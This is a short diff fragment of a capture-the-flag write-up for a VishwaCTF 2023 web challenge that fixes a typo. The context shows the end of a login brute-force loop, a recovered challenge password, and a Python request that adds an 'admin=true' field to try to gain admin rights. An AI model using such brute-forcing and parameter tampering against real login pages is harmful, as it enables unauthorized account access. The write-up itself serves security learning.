HackDagos/writeups/VishwaCTF2023/web/Spooky.md

 	if "Incorrect" not in res.text:
 		break
 ```
-At this point we are logged as user shrekop, with password "VmU5gnXKYN2vLp48", but there's no flag on the page.
+At this point we are logged in as user shrekop, with password "VmU5gnXKYN2vLp48", but there's no flag on the page.
 After thinking about it, the first idea was insert an additional param ```admin='true'``` in the form in order maybe to become admin with the code lines:
 ```Python
 res = requests.post("https://ch39763117927.ch.eng.run/login.php", data={"user": correct[0], "pass": correct[1], 'admin': 'true'})
 print(res.text)